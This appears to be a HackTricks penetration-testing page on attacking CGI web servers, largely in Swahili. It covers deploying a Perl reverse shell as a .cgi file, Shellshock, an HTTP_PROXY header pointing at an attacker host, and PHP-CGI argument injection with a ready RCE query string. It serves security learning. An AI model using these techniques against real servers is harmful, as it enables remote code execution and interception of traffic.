CGI
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
The CGI scripts are perl scripts, so, if you have compromised a server that can execute .cgi scripts you can upload a perl reverse shell (/usr/share/webshells/perl/perl-reverse-shell.pl
), change the extension from .pl to .cgi, give execute permissions (chmod +x
) and access the reverse shell from the web browser to execute it. In order to test for CGI vulns it's recommended to use nikto -C all
(and all the plugins)
ShellShock ni udhaifu unaoathiri Bash shell ya amri inayotumika sana katika mifumo ya uendeshaji ya Unix. Inalenga uwezo wa Bash kuendesha amri zinazopitishwa na programu. Udhaifu huu uko katika udanganyifu wa mabadiliko ya mazingira, ambayo ni thamani zenye majina zinazobadilika ambazo zinaathiri jinsi michakato inavyofanya kazi kwenye kompyuta. Washambuliaji wanaweza kutumia hili kwa kuambatanisha kodhi mbaya kwenye mabadiliko ya mazingira, ambayo inatekelezwa mara tu inapopewa mabadiliko hayo. Hii inawawezesha washambuliaji kuweza kuathiri mfumo.
Kukabili udhaifu huu ukurasa unaweza kutoa kosa.
Unaweza kupata udhaifu huu kwa kutambua kwamba inatumia toleo la zamani la Apache na cgi_mod (ikiwa na folda ya cgi) au kutumia nikto.
Majaribio mengi yanategemea kutuma kitu na kutarajia kwamba ile string itarudishwa katika jibu la wavuti. Ikiwa unafikiri ukurasa unaweza kuwa na udhaifu, tafuta kurasa zote za cgi na uzijaribu.
Nmap
CGI inaunda variable ya mazingira kwa kila kichwa katika ombi la http. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com"
Kama variable ya HTTP_PROXY inaweza kutumika na seva ya wavuti. Jaribu kutuma kichwa chenye: "Proxy: <IP_attacker>:<PORT>" na ikiwa seva itafanya ombi lolote wakati wa kikao. Utaweza kukamata kila ombi lililofanywa na seva.
Kimsingi ikiwa cgi iko hai na php ni "ya zamani" (<5.3.12 / < 5.4.2) unaweza kutekeleza msimbo. Ili kutumia udhaifu huu unahitaji kufikia faili fulani la PHP la seva ya wavuti bila kutuma vigezo (hasa bila kutuma herufi "="). Kisha, ili kujaribu udhaifu huu, unaweza kufikia kwa mfano /index.php?-s
(angalia -s
) na msimbo wa chanzo wa programu utaonekana katika jibu.
Kisha, ili kupata RCE unaweza kutuma uchunguzi huu maalum: /?-d allow_url_include=1 -d auto_prepend_file=php://input
na msimbo wa PHP utakaotekelezwa katika mwili wa ombi. Mfano:
Maelezo zaidi kuhusu vuln na uwezekano wa exploits: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, Mfano wa CTF Writeup.
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)